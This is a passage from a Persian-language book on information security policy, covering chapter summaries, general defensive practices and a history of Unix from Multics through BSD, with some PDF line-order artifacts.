ﺣﺮﻛﺖ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺩﺭ ﺗﻮﺳﻌﺔ ﺑﺎﺯﺍﺭﻫﺎﻱ ﻓﻌﻠﻲ ﺟﻬﺎﻥ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﺷﻮﻧﺪ .ﻭﺟﻮﺩ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﻨﺎﺳﺐ ﻭ ﺍﺟﺮﺍﻱ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ،
ﻣﺨﺎﻃﺮﺓ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﺍﻃﻼﻋﺎﺕ ﺑﺼﻮﺭﺕ ﺗﺼﺎﺩﻓﻲ ﻭ ﻋﻤﺪﻱ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺧﻮﺍﻫﺪ ﺭﺳﺎﻧﺪ ﻭ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺭﺍ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺣﻤﻠﻪﻫﺎ ﻭ ﺗـﺮﻣﻴﻢ
ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ .ﻫﻤﭽﻨﻴﻦ ﻻﺯﻡ ﺍﺳﺖ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺣﻮﺯﻩ SMEﻫﺎ ،ﻋﻨﺎﺻﺮﻱ ﭼﻮﻥ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ
ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﻣﺤﻴﻄﻬﺎﻱ ﺗﻌﺎﻣﻠﻲ ﺍﺯ ﻗﺒﻴﻞ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺩﻭﻟﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ .ﺍﻳـﻦ ﺑﺨـﺶ
ﭘﻴﺸﻨﻬﺎﺩﺍﺗﻲ ﺩﺍﺷﺖ ﻣﺒﻨﻲ ﺑﺮ ﺍﻳﻨﻜﻪ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻥ ﻣﻘﺮﺭﺍﺕ ﺍﻣﻨﻴﺘﻲ ﻣﺴﺘﺤﻜﻢ ﺭﺍ ﺩﺭ ﺣﻮﺯﺓ ﻣﺤﻴﻄﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﺣﺎﻛﻢ ﻛﺮﺩ ﻭ ﮔﺴﺘﺮﺵ ﺩﺍﺩ.
ﺑﺨﺶ ۴ﺭﻭﻱ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻭ ﺍﺑﺘﻜﺎﺭﻫﺎﻱ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﺗﺄﻛﻴﺪ ﺩﺍﺭﺩ؛ ﻭ ﺑﻴﺎﻥ ﻣﻲﻛﻨﺪ ﻛﻪ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﺑﺎﻳﺪ ﺩﺭ ﺳﻄﺢ ﺩﻭﻟﺖ ﺩﺭﻙ ﺷﻮﺩ ﻭ ﺑﻪ
ﺍﺟﺮﺍ ﺩﺭﺁﻳﺪ .ﺩﻭﻟﺖ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻤﻦﺳﺎﺯﻱ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺧﻮﺩ ،ﻣﻮﻇﻒ ﺍﺳﺖ ﺑﺮﺍﻱ ﺍﻳﻤﻦﺳـﺎﺯﻱ ﻭ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﻣﻠـﻲ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺍﻃﻼﻋﺎﺕ ﻧﻴﺰ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻛﻨﺪ .ﺩﻭﻟﺘﻬﺎ ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳﺪ ﭘﻴﺶﺑﻴﻨﻲ ﻛﻨﻨﺪ ﻛﻪ ﺭﺷﺪ ﺯﻳﺮﺳﺎﺧﺖ ﺍﻃﻼﻋﺎﺕ ﺭﻭﻱ ﻧﻈﺎﻡ ﺣﻘﻮﻗﻲ ﺁﻧﻬﺎ ﭼﻪ ﺗـﺄﺛﻴﺮﻱ
ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﺍﻳﻦ ﺑﺨﺶ ﺑﺮﺧﻲ ﺍﺯ ﺳﺆﺍﻻﺕ ﻛﻠﻴﺪﻱ ﻛﻪ ﺳﻴﺎﺳـﺘﮕﺬﺍﺭﺍﻥ ﻭ ﺭﻫﺒـﺮﺍﻥ ﺩﺭ ﺩﻧﻴـﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺑـﺎ ﺁﻥ ﻣﻮﺍﺟـﻪ ﻫـﺴﺘﻨﺪ ﺭﺍ
ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ ﻭ ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺟﺎﻣﻌﻪ ﺟﻬﺎﻧﻲ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻧﻤﺎﻳﺪ ﻛﻪ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑﻌﻨـﻮﺍﻥ ﺭﺍﻫﻨﻤـﺎ ﺑـﺮﺍﻱ ﻛـﺴﺎﻧﻲ ﻛـﻪ ﺩﺭﮔﻴـﺮ
ﺗﻼﺷﻬﺎﻱ ﺟﺪﻳﺪ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﺑﺮﺍﻱ ﻓﻀﺎﻱ ﻣﺠﺎﺯﻱ ١ﻫﺴﺘﻨﺪ ﺑﻜﺎﺭ ﺁﻳﺪ.
ﻛﻨﺘﺮﻝ ﺗﺮﺍﻓﻴﻚ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺣﺴﺎﺱ ﻭ ﺷﺒﻜﻪ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺑﺮﺍﻱ ﺣﻤﻠﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺩﺭﺻـﻮﺭﺕ ﺍﻣﻜـﺎﻥ •
ﺩﻓﻊ ﺷﻮﻧﺪ.
٢
ﺍﺭﺯﺷﮕﺬﺍﺭﻱ ﻧﺘﺎﻳﺞ ﺍﺭﺯﻳﺎﺑﻴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺯﻣﺎﻧﻴﻜﻪ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻓﺮﺁﻳﻨﺪﻫﺎ ﺩﺭﺣﺎﻝ ﺗﻮﻟﻴﺪ ﺷﺪﻥ ﻫﺴﺘﻨﺪ ﻭ ﺗﺤﻠﻴـﻞ ﻧﺘـﺎﻳﺞ ﺛﺒﺘﻬـﺎ ﻭ ﺳـﺎﻳﺮ •
ﻣﺪﺍﺭﻙ ﺟﺎﺭﻱ ﺑﻌﺪ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻥ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ.
ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻳﻚ ﺣﻤﻠﻪ ،ﺗﺮﻣﻴﻢ ﻳﻚ ﻧﻔﻮﺫ ،ﻭ ﻳﺎﺩﮔﻴﺮﻱ ﺍﺯ ﺗﺠﺮﺑﻴﺎﺕ ﮔﺬﺷﺘﻪ. •
ﺑﺨﺶ ۵ﺑﺎ ﭼﻬﺎﺭ ﺑﺨﺶ ﺩﻳﮕﺮ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺯ ﺁﻥ ﺟﻬﺖ ﺗﻔﺎﻭﺕ ﺩﺍﺭﺩ ﻛﻪ ﻓﺮﺽ ﻣﻲﻛﻨﺪ ﺧﻮﺍﻧﻨﺪﻩ ﺍﺯ ﺳﻄﺢ ﻣﻌﻴﻨﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻓﻨﻲ ﺑﺮﺧـﻮﺭﺩﺍﺭ
ﺍﺳﺖ .ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﻣﻔﺎﻫﻴﻢ ﺑﻪ ﻭﺿﻮﺡ ﺷﺮﺡ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ ﻭ ﻫﺮﺟﺎ ﻛﻪ ﺍﻣﻜﺎﻥ ﺩﺍﺷﺘﻪ ﻣﺜﺎﻟﻬﺎﺋﻲ ﺍﺭﺍﺋﻪ ﺷﺪﻩﺍﻧﺪ ،ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳـﻦ ﺑﺨـﺶ ﺑـﺮﺍﻱ
ﺍﻓﺮﺍﺩﻱ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺍﺳﺖ ﻛﻪ ﺗﺠﺮﺑﺔ ﻛﺎﻓﻲ ﻛﺎﺭ ﺑﺎ ﺳﻴﺴﺘﻢ ﻭ ﺭﺍﻫﺒﺮﻱ ﺁﻥ ﺩﺍﺭﻧﺪ )ﻳﺎ ﺣﺪﺍﻗﻞ ﺑـﺴﻴﺎﺭ ﻋﻼﻗـﻪﻣﻨـﺪ ﺑـﻪ ﺁﻥ ﻫـﺴﺘﻨﺪ( .ﺑـﻪ ﺧﻮﺍﻧﻨـﺪﮔﺎﻥ
ﻋﻼﻗﻪﻣﻨﺪ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ﺍﺯ ﺿﻤﺎﺋﻢ ﻛﺘﺎﺏ ﻛﻪ ﺑﻪ ﻣﺂﺧﺬ ﺍﺭﺯﺷﻤﻨﺪ ﻓﺮﺍﻭﺍﻧﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﻧﮕﻬﺪﺍﺭﻱ ﺭﺍﻳﺎﻧﻪ ﻭ ﺷﺒﻜﻪ ﺍﺷﺎﺭﻩ ﺩﺍﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻨﺪ.
ﻻ ﺑﻪ ﻣﺤﻴﻄﻬﺎﻱ ﻋﻤﻠﻴﺎﺗﻲ ﺭﺍﻳﺎﻧﻪ ﻣﺮﺑﻮﻁ ﻫﺴﺘﻨﺪ ،ﺑﺨﺶ ۵ﺷﺎﻣﻞ ﻗﺴﻤﺘﻬﺎﻳﻲ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ ﻛـﻪ ﻣـﺴﺎﺋﻞ ﻧﻈﺮ ﺑﻪ ﺍﻳﻨﻜﻪ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻣﻌﻤﻮ ﹰ
ﺍﻣﻨﻴﺘﻲ ﺷﻨﺎﺧﺘﻪﺷﺪﺓ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻋﻤﺪﻩ ﻛﻪ ﺍﻣﺮﻭﺯﻩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻫﺴﺘﻨﺪ ﺭﺍ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ .ﮔﺮﭼﻪ ﻗﺴﻤﺖ ﻋﻤﺪﺓ ﺑﺨﺶ ۵ﺗﺎ
ﺟﺎﻳﻲ ﻛﻪ ﺍﻣﻜﺎﻥ ﺩﺍﺷﺘﻪ ﻏﻴﺮ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺳﺖ ،ﺍﻣﺎ ﮔﺎﻫﻲ ﺍﺭﺟﺎﻉﻫﺎﻳﻲ ﻧﻴﺰ ﺑﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ،Unix ،Microsoft Windows
،Mac OS X ،Linuxﻭ ﺳﺎﻳﺮ ﮔﻮﻧﻪﻫﺎﻱ Unixﺭﻭﻣﻴﺰﻱ ٣ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ .ﺩﺭ ﻫﻤﺔ ﻣﻮﺍﺭﺩ ﺗﻮﺻﻴﻪﻫـﺎﻱ ﺭﻭﺷـﻨﻲ ﺩﺭﺑـﺎﺭﻩ ﺍﻗـﺪﺍﻣﺎﺗﻲ ﻛـﻪ
ﻣﻲﺗﻮﺍﻥ ﻭ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺑﻪﺗﺴﺨﻴﺮ ﺩﺭﺁﻣﺪﻥ ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻤﻲ ﺍﻧﺠﺎﻡ ﺩﺍﺩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ.
Unix
ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ Unixﻭ ﺷﺒﻪ Unixﻣﺘﻨﻮﻋﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ )ﻛﻪ ﮔﺎﻩ ﻛﺎﻣ ﹰﻼ ﺑﺎ ﻫﻢ ﻣﺘﻔﺎﻭﺗﻨـﺪ( ﻭ ﺗﻮﺳﻂ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻣﺘﻔﺎﻭﺗﻲ ﺗﻮﺯﻳـﻊ ﻣـﻲﺷـﻮﻧﺪ.
ﺩﻟﻴﻞ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻭ ﺗﺄﺛﻴﺮﺍﺕ ﺁﻥ ﻣﺴﺘﻠﺰﻡ ﻳﻚ ﻣﺮﻭﺭ ﻣﺨﺘﺼﺮ ﺗﺎﺭﻳﺨﻲ ﺍﺳﺖ.
ﺭﻳﺸﻪﻫﺎﻱ Unixﺑﺎﺯ ﻣﻲﮔﺮﺩﺩ ﺑﻪ ﻃﺮﺡ Multicsﺩﺭ ﺍﻭﺍﺳﻂ ﺳـﺎﻟﻬﺎﻱ .۱۹۶۰ﺍﻳـﻦ ﭘـﺮﻭﮊﻩ ﻛـﻪ ﺑﻮﺳـﻴﻠﻪ ﺳـﺎﺯﻣﺎﻥ ﻃﺮﺣﻬـﺎﻱ ﺗﺤﻘﻴﻘـﺎﺗﻲ
ﭘﻴﺸﺮﻓﺘﻪ ﻭﺯﺍﺭﺕ ﺩﻓﺎﻉ ﺍﻳﺎﻟﺖ ﻣﺘﺤﺪﻩ ) DARPAﻳﺎ (ARPAﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺷﺪ ﺑﺮﺍﻱ ﺁﻥ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩ ﻛﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﻳﻜﭙﺎﺭﭼﻪ ﻣﺘﺸﻜﻞ
ﺍﺯ ﺑﺎﻧﻜﻬﺎﻳﻲ ﺑﺎﺷﺪ ﻛﻪ ﺣﺎﻭﻱ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎ ،ﺣﺎﻓﻈﻪ ،ﻭ ﺗﺠﻬﻴﺰﺍﺕ ﺍﺭﺗﺒﺎﻃﻲ ﺑﺎ ﺳﺮﻋﺖ ﺑﺎﻻ ﺑﻮﺩﻧﺪ .ﺑﺮﺍﺳـﺎﺱ ﺍﻳـﻦ ﻃﺮﺍﺣـﻲ ،ﺑﺨـﺸﻲ ﺍﺯ ﺭﺍﻳﺎﻧـﻪ
ﻣﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ ﺁﻧﻜﻪ ﺭﻭﻱ ﺩﻳﮕﺮ ﻗﺴﻤﺘﻬﺎ ﻳﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺗﺄﺛﻴﺮ ﺑﮕﺬﺍﺭﺩ ،ﺑﺮﺍﻱ ﺗﻌﻤﻴﺮﺍﺕ ﺧﺎﻣﻮﺵ ﺷﻮﺩ .ﮔﺮﭼﻪ ﺍﻣﺮﻭﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺑﻪ ﺳﺎﺩﮔﻲ ﻣﻴﺴﺮ
ﺍﺳﺖ ،ﺍﻣﺎ ﻫﻨﮕﺎﻣﻲ ﻛﻪ Multicsﺷﺮﻭﻉ ﺑﻪ ﻛﺎﺭ ﻛﺮﺩ ﭼﻨﻴﻦ ﻗﺎﺑﻠﻴﺘﻲ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺖ Multics .ﺑﮕﻮﻧـﻪﺍﻱ ﻃﺮﺍﺣـﻲ ﺷـﺪ ﻛـﻪ ﻫـﻢ ﺩﺭ ﺑﺮﺍﺑـﺮ
ﺣﻤﻼﺕ ﺑﻴﺮﻭﻧﻲ ﻣﻘﺎﻭﻡ ﺑﺎﺷﺪ ﻭ ﻫﻢ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺍﺧﻠﻲ ﺳﻴﺴﺘﻢ ﺭﺍ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﺣﻔﺎﻇﺖ ﻛﻨـﺪ Multics .ﺑـﺎ ﻫـﺪﻑ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻣﻔﻬـﻮﻡ ﺍﻣﻨﻴـﺖ
ﭼﻨﺪﺳﻄﺤﻲ ٤ﻃﺮﺍﺣﻲ ﺷﺪ Multics .ﺑﺎﻻﺧﺮﻩ ﺳﻄﺤﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻭ ﺧﺪﻣﺎﺕ ﺭﺍ ﻓﺮﺍﻫﻢ ﻛﺮﺩ ﻛﻪ ﻫﻨﻮﺯ ﻫﻢ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ
ﺑﻪ ﺁﻥ ﻧﺮﺳﻴﺪﻩﺍﻧﺪ.
ﺩﺭﺣﺎﻟﻴﻜﻪ Multicsﺳﻌﻲ ﺩﺍﺷﺖ ﻛﺎﺭﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺍﻧﺠﺎﻡ ﺩﻫﺪ Unix ،ﺗﻼﺵ ﻣﻲﻛﺮﺩ ﻳﻚ ﻛﺎﺭ ﺭﺍ ﺧﻮﺏ ﺍﻧﺠـﺎﻡ ﺩﻫـﺪ :ﺍﺟـﺮﺍﻱ ﺑﺮﻧﺎﻣـﻪﻫـﺎ.
"ﺍﻣﻨﻴﺖ ﻗﻮﻱ" ﺑﺨﺸﻲ ﺍﺯ ﺍﻳﻦ ﻫﺪﻑ ﻧﺒﻮﺩ .ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﺑﺮﺍﺳﺎﺱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻓﺸﺮﺩﻩﺳﺎﺯﻱﺷﺪﻩ ﻣﻮﺳﻮﻡ ﺑﻪ ﺍﺑﺰﺍﺭﻫﺎ ٥ﻛﺎﺭ ﻣﻲﻛﺮﺩ ﻛـﻪ ﻫﺮﻛـﺪﺍﻡ
ﻋﻤﻠﻴﺎﺕ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩﻱ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﺍﺩﻧـﺪ .ﺷـﺮﻛﺖ ﺗﻠﻔـﻦ ﻭ ﺗﻠﮕـﺮﺍﻑ ﺁﻣﺮﻳﻜـﺎ ) ٦(AT&Tﺩﺭ ﺧـﻼﻝ ﺳـﺎﻟﻬﺎﻱ ﺩﻫـﺔ ۱۹۷۰ﺍﺑﺰﺍﺭﻫـﺎ ﻭ
ﻭﻳﮋﮔﻴﻬﺎﺋﻲ ﺑﻪ ﺁﻥ ﺍﺿﺎﻓﻪ ﻛﺮﺩ .ﺩﺭ ﺳﺎﻝ ۱۹۷۳ﺗﺎﻣﺴﻮﻥ ٧ﺑﻴﺸﺘﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ Unixﺭﺍ ﺑﻪ ﺯﺑﺎﻥ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ Cﻛﻪ ﺭﻳﭽﻲ ٨ﺑﻪ ﺗـﺎﺯﮔﻲ ﺁﻧـﺮﺍ
ﺍﺑﺪﺍﻉ ﻛﺮﺩﻩﺑﻮﺩ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻛﺮﺩ .ﺯﺑﺎﻥ Cﻃﻮﺭﻱ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩ ﻛﻪ ﻳﻚ ﺯﺑﺎﻥ ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺴﻲ ﺳﺎﺩﻩ ﻭ ﺟﺎﺑﺠﺎﻳﻲﭘـﺬﻳﺮ ﺑﺎﺷـﺪ .ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ
ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﺑﻪ ﺯﺑﺎﻥ Cﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﺑﻪ ﺳﺎﺩﮔﻲ ﺍﺯ ﻳﻚ ﻧـﻮﻉ ﺭﺍﻳﺎﻧـﻪ ﺑـﻪ ﻧـﻮﻉ ﺩﻳﮕـﺮ ﻣﻨﺘﻘـﻞ ﺷـﻮﻧﺪ ،ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﺍﻳﻨﻜـﺎﺭ ﺩﺭ ﺯﺑﺎﻧﻬـﺎﻱ
2 Logs
3 Desktop Unix
4 Multilevel Security
5 Tools
6 American Telephone & Telegraph
7 Thompson
8 Ritchie
٢٥٩ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﺳﻄﺢ ﺑﺎﻻ ﻣﺜﻞ Fortranﺍﻧﺠﺎﻡﭘﺬﻳﺮ ﺑﻮﺩ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺗﻘﺮﻳﺒﹰﺎ ﺑﺎ ﺳﺮﻋﺖ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑﻪ ﺯﺑﺎﻥ ﺑـﻮﻣﻲ
ﻣﺎﺷﻴﻦ ﻛﺪﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﻧﺪ ﺍﺟﺮﺍ ﻣﻲﺷﺪﻧﺪ .ﺗﺎ ﺳﺎﻝ ۱۹۷۷ﺑﻴﺶ ﺍﺯ ۵۰۰ﺍﺩﺍﺭﻩ ﺍﺯ ﺑﺮﻧﺎﻣﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻧﺪ؛ ۱۲۵ﺍﺩﺍﺭﻩ ﻋﺒﺎﺭﺕ
ﺑﻮﺩﻧﺪ ﺍﺯ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻭ ﺑﻴﺶ ﺍﺯ ۱۰ﻛﺸﻮﺭ ﺧﺎﺭﺟﻲ ﺩﻳﮕﺮ.
ﺗﻮﺳﻌﻪ ﺩﺭ ﻧﻘﺎﻁ ﻣﺨﺘﻠﻔﻲ ﺍﺩﺍﻣﻪ ﻳﺎﻓﺖ؛ ﺍﺯ ﺟﻤﻠﻪ ﺩﺍﻧﺸﮕﺎﻩ ﻛﺎﻟﻴﻔﺮﻧﻴﺎ ﺩﺭ ﺑﺮﻛﻠﻲ ،ﻛـﻪ ﮔـﺴﺘﺮﺵ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺑﺮﻛﻠـﻲ ) - ٩(BSDﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ
ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﺗﻐﻴﻴﺮﺍﺕ ﺩﺭ ﺳﻴﺴﺘﻢ - Unixﺭﺍ ﻣﻨﺘﺸﺮ ﻛﺮﺩ .ﺩﺭ ۶ﺳﺎﻝ ﺑﻌﺪﻱ ،ﺩﺭ ﻓﻌﺎﻟﻴﺘﻲ ﻛﻪ ﺗﻮﺳﻂ ARPAﺭﻭﻱ ﺁﻥ ﺳﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻱ ﺷـﺪ،
ﺁﻧﭽﻪ ﺗﺎ ﺁﻧﺰﻣﺎﻥ BSD Unixﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﺪ ﺗﺎ ﺣﺪ ﻭ ﺍﻧﺪﺍﺯﻩﻫﺎﻱ ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﺴﺘﻘﻞ ﺭﺷﺪ ﻛﺮﺩ ﻭ ﺑﺎﻋﺚ ﺍﺻﻼﺣﺎﺕ ﭼـﺸﻤﮕﻴﺮﻱ ﺩﺭ
ﺳﻴﺴﺘﻢﻋﺎﻣﻞ AT&Tﺷﺪ .ﺷﺎﻳﺪ ﻣﻬﻤﺘﺮﻳﻦ ﺍﺻﻼﺣﺎﺕ ﺑﺮﻛﻠﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﺷﺒﻜﻪ ﺑﻮﺩ ،ﻛﻪ ﺍﺗﺼﺎﻝ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ Unixﺭﺍ ﺑﻪ ﺷﺒﻜﻪﻫـﺎﻱ ﻣﺤﻠـﻲ
)LANﻫﺎ( ١٠ﺁﺳﺎﻥ ﻣﻲﻛﺮﺩ .ﺑﻪ ﻫﻤﻪ ﺍﻳﻦ ﺩﻻﻳﻞ Unix ،ﻧﺴﺨﺔ ﺑﺮﻛﻠﻲ ﺩﺭ ﺟﻮﺍﻣ ﹺﻊ ﺗﺤﻘﻴﻘﺎﺗﻲ ﻭ ﻋﻠﻤﻲ ﺭﻭﺍﺝ ﺑﺴﻴﺎﺭ ﭘﻴﺪﺍ ﻛﺮﺩ.
ﺩﺭ ﺍﻭﺍﺧﺮ ﺳﺎﻟﻬﺎﻱ ۱۹۸۰ﺯﻣﺎﻧﻴﻜﻪ Unixﺍﺯ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﻓﻨﻲ ﺑـﻪ ﺑﺎﺯﺍﺭﻫـﺎﻱ ﺗﺠـﺎﺭﻱ ﺭﺍﻩ ﭘﻴـﺪﺍ ﻛـﺮﺩ ،ﻧﺎﺳـﺎﺯﮔﺎﺭﻳﻬﺎﻱ ﻣﻴـﺎﻥ ﻧـﺴﺨﻪﻫـﺎﻱ
ﺳﻴﺴﺘﻢﻋﺎﻣﻞ AT&T Unixﻭ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﺒﺘﻨﻲ ﺑﺮ BSD Unixﺷﺮﻭﻉ ﺑﻪ ﺍﻳﺠﺎﺩ ﻣﺸﻜﻼﺕ ﺑﺮﺍﻱ ﻫﻤﺔ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻧﻤﻮﺩ .ﻣﺸﺘﺮﻳﺎﻥ
ﺗﺠﺎﺭﻱ ﺧﻮﺍﻫﺎﻥ ﻳﻚ ﻧﺴﺨﻪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ Unixﺑﻮﺩﻧﺪ ،ﺑﻪ ﺍﻳﻦ ﺍﻣﻴﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺁﻣـﻮﺯﺵ ﺭﺍ ﻛـﺎﻫﺶ ﺩﻫﻨـﺪ ﻭ ﻗﺎﺑﻠﻴـﺖ ﺟﺎﺑﺠـﺎﻳﻲ
ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺳﺎﺧﺘﻪﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﻓﺮﻭﺷﻨﺪﻩﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺭﺍ ﺗﻀﻤﻴﻦ ﻛﻨﻨﺪ .ﻫﻤﭽﻨـﻴﻦ ﺑـﺎﺯﺍﺭ ﻧﻮﻇﻬـﻮﺭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ
